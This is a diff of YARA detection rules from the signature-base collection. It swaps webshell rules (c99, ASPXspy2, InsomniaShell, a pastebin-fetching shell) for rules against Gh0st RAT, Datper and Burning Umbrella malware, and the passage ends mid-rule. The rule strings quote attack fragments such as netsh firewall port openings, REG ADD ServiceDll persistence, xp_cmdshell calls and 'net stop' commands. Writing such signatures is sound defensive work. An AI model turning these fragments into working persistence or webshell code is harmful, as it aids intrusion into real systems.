-		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
-		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+		$str_netsh_1 = "netsh firewall add portopening TCP %d" ascii wide nocase
+		$str_netsh_2 = "netsh firewall delete portopening TCP %d" ascii wide nocase
+		$str_mask_1 = "cmd.exe /c \"%s >> %s 2>&1\"" ascii wide
+		$str_mask_2 = "cmd.exe /c \"%s 2>> %s\"" ascii wide
+		$str_mask_3 = "%s\\%s\\%s" ascii wide
+		$str_other_1 = "perflog.dat" ascii wide nocase
+		$str_other_2 = "perflog.evt" ascii wide nocase
+		$str_other_3 = "cbstc.log" ascii wide nocase
+		$str_other_4 = "LdrGetProcedureAddress" ascii
+		$str_other_5 = "NtProtectVirtualMemory" ascii
 
 	condition:
-		all of them
+		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $str_netsh* ) and 1 of ( $str_mask* ) and 1 of ( $str_other* )
 }
-rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell
+rule SIGNATURE_BASE_Ghostdragon_Gh0Strat : FILE
 {
 	meta:
-		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5080e43-44e2-54fa-b03a-057dc75d14db"
-		date = "2014-12-10"
-		modified = "2025-03-29"
-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9077-L9090"
+		id = "a74330ab-5249-5125-8f48-27aec7c6eeb4"
+		date = "2016-04-23"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/the-ghost-dragon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ghostdragon_gh0st_rat.yar#L8-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7efaca469d09ce7ecba4ed38cb0b07d1b9fc4f45172d2ffb6f5d3259c000fdc5"
-		score = 60
-		quality = 85
-		tags = ""
+		logic_hash = "b67c7ff76c14e771c4e952a408c2c006c9ae88fda97b775747a95322aff355e7"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197"
+		hash2 = "99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2"
+		hash3 = "6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df"
+		hash4 = "b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5"
 
 	strings:
-		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
-		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+		$x1 = "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"" fullword ascii
+		$x2 = "Global\\REALCHEL_GLOBAL_SUBMIT_20031020_" ascii
+		$x3 = "\\xclolg2.tmp" ascii
+		$x4 = "Http/1.1 403 Forbidden" fullword ascii
+		$x5 = "%sxsd%d.pif" fullword ascii
+		$x6 = "%s\\%s32.dl_" ascii
+		$x7 = "%-23s %-16s  0x%x(%02d)" fullword ascii
+		$x8 = "RegSetValueEx(start)" fullword ascii
+		$x9 = "%s\\%s64.dl_" ascii
+		$s1 = "viewsc.dll" fullword ascii
+		$s2 = "Proxy-Connection:   Keep-Alive" fullword ascii
+		$s3 = "\\sfc_os.dll" ascii
+		$s4 = "Mozilla/4.0 (compatible)" fullword ascii
+		$s5 = "Http/1.1 403 Forbidden" fullword ascii
+		$s6 = "CONNECT   %s:%d   HTTP/1.1" fullword ascii
+		$s7 = "WindowsUpperVersion" fullword ascii
+		$s8 = "[%d-%d-%d %d:%d:%d] (%s)" fullword ascii
+		$s9 = "SOFTWARE\\Microsoft\\DataAccess\\%s" fullword ascii
+		$s10 = "%s sp%d(%d)" fullword ascii
+		$s11 = "OpenSC ERROR " fullword ascii
+		$s12 = "get rgspath error " fullword ascii
+		$s13 = "Global\\GLOBAL_SUBMIT_0234_" ascii
+		$s14 = "Global\\_vc_ck_ %d" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell_2
+rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample2 : FILE
 {
 	meta:
-		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91575627-78c1-5ca1-8180-cc4004df88e8"
-		date = "2014-12-10"
-		modified = "2025-03-29"
-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9092-L9107"
+		id = "424cb978-c4d1-5847-8852-e25ec2a02139"
+		date = "2016-04-23"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/the-ghost-dragon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ghostdragon_gh0st_rat.yar#L54-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f7fa5872d8eb4ba1d0b26d966d7650d70b1a10c56945d5a5340b8e1cb5d0f5f0"
-		score = 60
+		logic_hash = "f41776a033be766844c9867902d2ef9b79bf59bdf212f0158eccf79db0810460"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "71a52058f6b5cef66302c19169f67cf304507b4454cca83e2c36151da8da1d97"
 
 	strings:
-		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
-		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
-		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
-		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+		$x1 = "AdobeWpk" fullword ascii
+		$x2 = "seekin.dll" fullword ascii
+		$c1 = "Windows NT 6.1; Trident/6.0)" fullword ascii
+		$c2 = "Mozilla/5.0 (compatible; MSIE 10.0; " fullword ascii
 
 	condition:
-		all of ( $a* ) or all of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( all of ( $x* ) or all of ( $c* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Webshell_Insomnia
+rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample3
 {
 	meta:
-		description = "Insomnia Webshell - file InsomniaShell.aspx"
+		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62ed3695-9ab8-54d4-a9d2-b6270c56ccfb"
-		date = "2014-12-09"
-		modified = "2025-03-29"
-		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9109-L9130"
+		id = "6d4bb99d-28de-59c2-b6f0-6da3cac4ed73"
+		date = "2016-04-23"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/the-ghost-dragon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ghostdragon_gh0st_rat.yar#L77-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
-		logic_hash = "d170c60f94092a38ba4af92283debd059eef2e4c683fd7737ffd60d1a2581d9c"
-		score = 80
+		logic_hash = "39ddb94ac14032f88e54e413ed650277e95f6dcf66219fcf43a01aff1f10a058"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1be9c68b31247357328596a388010c9cfffadcb6e9841fb22de8b0dc2d161c42"
 
 	strings:
-		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
-		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
-		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
-		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
-		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
-		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
-		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
-		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+		$op1 = { 44 24 15 65 88 54 24 16 c6 44 24 }
+		$op2 = { 44 24 1b 43 c6 44 24 1c 75 88 54 24 1e }
+		$op3 = { 1e 79 c6 44 24 1f 43 c6 44 24 20 75 88 54 24 22 }
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hawkeye_PHP_Panel : FILE
+
+rule SIGNATURE_BASE_Datper_Backdoor : FILE
 {
 	meta:
-		description = "Detects HawkEye Keyloggers PHP Panel"
+		description = "Detects Datper Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d185345-6684-538f-954a-45d57a618a7a"
-		date = "2014-12-14"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9132-L9147"
+		id = "547db8bb-cc02-5521-8b85-845b1652fee9"
+		date = "2017-08-21"
+		modified = "2023-12-05"
+		reference = "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tick_datper.yar#L13-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e29b6df4e3aa3892b10e68218320ac76cecb5a1bbe6c48f2276014b972cbbdd8"
-		score = 60
+		logic_hash = "eacdc648226f20fa3847f0b5e8cafcee59cc1c6274cabb885db297f5b5fceafb"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849"
+		hash2 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
+		hash3 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
+		hash4 = "12d9b4ec7f8ae42c67a6fd030efb027137dbe29e63f6f669eb932d0299fbe82f"
+		hash5 = "2384e8ad8eee6db1e69b3ee7b6b3d01ae09f99a86901a0a87fb2788c1115090c"
+		hash6 = "1e511c32cdf8abe23d8ba7c39da5ce7fc6c87fdb551c9fc3265ee22ac4076e27"
+		hash7 = "7bc042b9a599e1024a668b9921e2a42a02545429cf446d5b3d21f20185afa6ce"
 
 	strings:
-		$s0 = "$fname = $_GET['fname'];" ascii fullword
-		$s1 = "$data = $_GET['data'];" ascii fullword
-		$s2 = "unlink($fname);" ascii fullword
-		$s3 = "echo \"Success\";" fullword ascii
+		$s1 = "RtlGetCo" fullword ascii
+		$s2 = "hutils" fullword ascii
+		$s3 = "kza2FWU,f;\"3U&zpa3U(W`J" fullword ascii
+		$c1 = "dkkwldngn" fullword ascii
+		$c2 = "ndkkwqgcm" fullword ascii
 
 	condition:
-		all of ( $s* ) and filesize < 600
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "58db98e2334746d349d607e4d73bc5ea" or pe.imphash ( ) == "8fbed921458af485ce84fb7d9b13899e" or ( 2 of ( $s* ) and 1 of ( $c* ) ) or ( $s3 and $c1 ) ) )
 }
-rule SIGNATURE_BASE_Soaksoak_Infected_Wordpress
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_1 : FILE
 {
 	meta:
-		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d147af65-72de-50be-9435-bef47eb4842a"
-		date = "2014-12-15"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/1GzWUX"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9149-L9164"
+		id = "9f8a6831-172b-5310-9763-43657b79b91d"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L13-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4cba18a0d14be2795d71a1973265a1742beda57636f64c1974001ecf70e3e91d"
-		score = 60
+		logic_hash = "d8ed432fea930eb9b4d695a4a68b833f4324fe0bbea3f0ccac2fe5934bfa1c22"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fcfe8fcf054bd8b19226d592617425e320e4a5bb4798807d6f067c39dfc6d1ff"
 
 	strings:
-		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
-		$s1 = "function FuncQueueObject()" ascii fullword
-		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+		$s1 = { 40 00 00 E0 75 68 66 61 6F 68 6C 79 }
+		$s2 = { 40 00 00 E0 64 6A 7A 66 63 6D 77 62 }
 
 	condition:
-		all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) )
 }
-rule SIGNATURE_BASE_Pastebin_Webshell
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_2 : FILE
 {
 	meta:
-		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "256051ed-da33-52b4-8bfb-ab990648d8fb"
-		date = "2015-01-13"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/7dbyZs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9166-L9188"
+		id = "926b4a29-ce47-559b-94e3-1fabd90f3fbe"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L33-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e71429e9280c37a90ee77be888ae743a86521d3632afc4eeec480b82a22a1445"
-		score = 70
+		logic_hash = "0c298176e5849b2b202089f27cffb7646243d19a90898bbf079a97d2f624a27e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "801a64a730fc8d80e17e59e93533c1455686ca778e6ba99cf6f1971a935eda4c"
 
 	strings:
-		$s0 = "file_get_contents(\"http://pastebin.com" ascii
-		$s1 = "xcurl('http://pastebin.com/download.php" ascii
-		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
-		$x0 = "if($content){unlink('evex.php');" ascii
-		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
-		$y0 = "file_put_contents($pth" ascii
-		$y1 = "echo \"<login_ok>" ascii
-		$y2 = "str_replace('* @package Wordpress',$temp" ascii
+		$s1 = { 40 00 00 E0 63 68 72 6F 6D 67 75 78 }
+		$s2 = { 40 00 00 E0 77 62 68 75 74 66 6F 61 }
+		$s3 = "ActiveX Manager" wide
 
 	condition:
-		1 of ( $s* ) or all of ( $x* ) or all of ( $y* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) and $s3
 }
-rule SIGNATURE_BASE_Aspxspy2
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_3 : FILE
 {
 	meta:
-		description = "Web shell - file ASPXspy2.aspx"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b68e0c98-0136-58d8-a2d6-57abccb1e942"
-		date = "2015-01-24"
-		modified = "2025-03-29"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9190-L9216"
+		id = "b997822a-3f62-51b4-bd96-e780ffe60812"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L53-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
-		logic_hash = "59c88f8e2542dcde4bf5123147ea2c1ca408925ca966f3f34a4692a3ba7a0935"
+		logic_hash = "ad39864eec58b1c655bd3d510faa314702d118cee845da55d189e7252174eafb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "92efbecc24fbb5690708926b6221b241b10bdfe3dd0375d663b051283d0de30f"
 
 	strings:
-		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
-		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
-		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
-		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
-		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
-		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
-		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
-		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
-		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
-		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
-		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
-		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+		$s1 = "HKEY_CLASSES_ROOT\\Word.Document.8\\shell\\Open\\command" fullword ascii
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_27_9_C66_C99 : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_4 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b985ae7-1ae6-5976-9e8d-0d6b5faed75b"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9227-L9252"
+		id = "3489f64b-7ebc-55b8-bd11-afaa719e572b"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L68-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71ae0a3843151a2eec913f62167b23cf9e0c759b18ebe0759174d3503fb23717"
-		score = 70
+		logic_hash = "1889ce1101ebb352c33279d40641f1f2312c45c6f7e267f4912a9faf320e5971"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
-		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
-		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
-		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
-		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
-		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash1 = "a1629e8abce9d670fdb66fa1ef73ad4181706eefb8adc8a9fd257b6a21be48c6"
 
 	strings:
-		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
-		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
-		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
+		$x1 = "dumpodbc.exe" fullword ascii
+		$x2 = "photo_Bundle.exe" fullword ascii
+		$x3 = "Connect 2 fails : %d,%s:%d" fullword ascii
+		$x4 = "Connect fails 1 : %d %s:%d" fullword ascii
+		$x5 = "New IP : %s,New Port: %d" fullword ascii
+		$x6 = "Micrsoft Corporation. All rights reserved." fullword wide
+		$x7 = "New ConFails : %d" fullword ascii
+		$s1 = "cmd /c net stop stisvc" fullword ascii
+		$s2 = "cmd /c net stop spooler" fullword ascii
+		$s3 = "\\temp\\s%d.dat" ascii
+		$s4 = "cmd /c net stop wuauserv" fullword ascii
+		$s5 = "User-Agent: MyApp/0.1" fullword ascii
+		$s6 = "%s->%s Fails : %d" fullword ascii
+		$s7 = "Enter WorkThread,Current sock:%d" fullword ascii
 
 	condition:
-		filesize < 685KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( ( pe.exports ( "Print32" ) and 2 of them ) or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Webshell_Acid_Antisecshell_3 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_6 : FILE
 {
 	meta:
-		description = "Detects Webshell Acid"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68d59f1e-ef35-586b-805d-1e6e3548d092"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9254-L9286"
+		id = "7198a734-fd54-5cb5-9966-b91796a415c7"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L101-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8c3fcde7afdafe8ead59e24e432fdd4ccae99f96f67b4be3e5a9cd74ff9b2e7"
-		score = 70
+		logic_hash = "ee671bc09cc0c84c9817ed800f1416a75f18a70fd2cf6a7e9f063fffa01fa003"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
-		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
-		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
-		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
-		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
-		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
-		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
-		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
-		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+		hash1 = "49ef2b98b414c321bcdbab107b8fa71a537958fe1e05ae62aaa01fe7773c3b4b"
 
 	strings:
-		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
-		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
+		$s1 = "ExecuteFile=\"hidcon:nowait:\\\"Word\\\\r.bat\\\"\"" fullword ascii
+		$s2 = "InstallPath=\"%Appdata%\\\\Microsoft\"" fullword ascii
 
 	condition:
-		filesize < 900KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_4 : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_7 : FILE
 {
 	meta:
-		description = "Detects C99 Webshell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5035906-df17-5149-92ae-51e6ec05996e"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9288-L9319"
+		id = "7e427512-a8ee-53ae-a141-e995e74ca845"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L117-L130"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa095d8da737e24a913eeadaca2882475366bf5cf0911dd9ff44aaa04871cc0f"
-		score = 70
+		logic_hash = "115774c17003408a04e4b2678f32392b5439b55f3d4688476f6f877520acf75d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
